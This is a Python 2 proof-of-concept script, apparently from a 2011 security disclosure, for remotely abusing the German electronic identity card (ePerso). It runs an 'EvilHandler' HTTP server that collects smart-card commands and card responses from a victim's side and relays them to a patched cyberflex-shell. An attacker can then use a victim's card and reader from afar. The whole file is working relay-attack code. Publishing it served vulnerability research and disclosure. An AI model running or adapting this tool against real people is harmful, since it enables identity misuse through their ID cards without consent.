# ePerso remote reading PoC
# by Jan Schejbal
# http://janschejbal.wordpress.com/2011/08/08/eperso-kann-remote-missbraucht-werden/

# Hier den request einstellen, der geschickt werden soll, wenn keine cyberflex-shell verbunden ist
DUMMY_MODE_REQUEST = "00 A4 04 00 07 A0 00 00 02 47 10 01 00"

HTTP_SERVER_PORT = 80

from SimpleHTTPServer import SimpleHTTPRequestHandler
import SocketServer
from threading import Thread
import cgi

import binascii

import socket
from time import sleep
import struct

request = None
response = None


def decodeHex(s):
	return binascii.unhexlify(s.replace(' ',''))

def encodeHex(s):
	hexstr = binascii.hexlify(s)
	result = ""
	for i in range(0, len(s)):
		result += hexstr[:2] + " "
		hexstr = hexstr[2:]
	return result.strip()
	
class EvilHandler(SimpleHTTPRequestHandler):
	def do_POST(self):
		global request
		global response
		self.send_response(200)
		self.send_header("Content-type", "text/plain")
		self.end_headers()
		
		if (self.path == '/getrequest/'):
			print "asked for request", 
			if (request != None):
				print "delivering"
				self.wfile.write(encodeHex(request))
				request = None
			else:
				self.wfile.write("---")
				print "none there"
		elif (self.path == '/putresponse/'):
			postdata = cgi.FieldStorage(
					fp=self.rfile,
					headers=self.headers,
					environ={'REQUEST_METHOD':'POST',
					# 'CONTENT_TYPE':self.headers['Content-Type'],
				 });
			hexresponse = postdata["r"].value;
			print "putting response:", hexresponse
			response = decodeHex(hexresponse);
		else:
			print "unknown POST", self.path

class EvilServer(Thread):
	def __init__(self, datasource):
		Thread.__init__(self)
		self.handler = EvilHandler
		self.httpd = SocketServer.TCPServer(("", HTTP_SERVER_PORT), self.handler)
		self.daemon = True
		
	def run(self):
		print "serving at port", HTTP_SERVER_PORT
		self.httpd.serve_forever()
	
def readDataBlock(conn):
	print "Receiving data,",
	binlen = ""
	# recv(1) = not nice, probably slow, but very easy...
	while (len(binlen) < 4):
		binlen += conn.recv(1)
	length = struct.unpack('>I', binlen)
	length = length[0]
	print "incoming data, length", length,
	readdata = ""
	while (len(readdata) < length):
		readdata += conn.recv(1)
	print "done"
	return readdata
	
def sendDataBlock(conn, data):
	conn.sendall(struct.pack('>I', len(data)))
	conn.sendall(data)
	
server = EvilServer('asdf')
server.start()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "connecting to cyberflex-shell"
try:
	s.connect(('127.0.0.1', 12345))
except:
	print "\n\nCONNECTION TO CYBERFLEX-SHELL FAILED"
	print "cyberflex-shell must be running on localhost (tcp 12345)"
	print "you need the remote-patched cyberflex-shell, no other readers may be connected"
	print "(your shell must display 'Waiting for remote card reader')"
	
	while 1:
		print "CYBERFLEX-SHELL NOT CONNECTED!\nRUNNING IN DUMMY MODE, preparing hardcoded request"
		request = decodeHex(DUMMY_MODE_REQUEST)
		print "Prepared DUMMY request"
		while (response == None):
			sleep(0.001)		
		print "Received response"
		response = None

print "connected"

# send fake ATR
sendDataBlock(s, "")

print "ATR sent"

while 1:
	request = readDataBlock(s)
	print "Received request"
	while (response == None):
		sleep(0.001)
	print "Received response"
	sendDataBlock(s, response)
	response = None
	